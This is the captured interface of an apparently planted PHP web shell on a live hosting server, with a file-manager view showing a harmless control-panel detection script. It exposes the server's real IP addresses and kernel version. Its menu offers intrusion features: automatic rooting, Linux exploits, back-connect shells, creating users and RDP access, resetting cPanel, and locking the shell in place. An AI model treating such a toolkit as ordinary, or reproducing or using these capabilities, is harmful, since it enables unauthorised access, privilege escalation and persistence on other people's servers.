Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.15.145.50
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-php-config /
[ HOME SHELL ]
Name
Size
Permission
Action
alt-php-panel-configuration.py
7.42
KB
-rwxr-xr-x
alt-php.cfg
211
B
-rwxr-xr-x
detectcp.py
690
B
-rwxr-xr-x
detectcp.pyc
740
B
-rw-r--r--
install_odbc
526
B
-rwxr-xr-x
multiphp_reconfigure.py
6.24
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : detectcp.py
#!/usr/bin/env python # -*- mode:python; coding:utf-8; -*- import os def getCPName(): # cPanel if os.path.isfile('/usr/local/cpanel/cpanel'): return "cPanel" # DirectAdmin if os.path.isfile('/usr/local/directadmin/directadmin') or \ os.path.isfile('/usr/local/directadmin/custombuild/build'): return "DirectAdmin" # InterWorx if os.path.isfile('/usr/local/interworx/iworx.ini'): return "InterWorx" # ISPManager if os.path.isfile('/usr/local/ispmgr/bin/ispmgr'): return "ISPManager" # Plesk if os.path.isfile('/usr/local/psa/version'): return "Plesk" # Unknown panel / No panel return "Unknown"
Close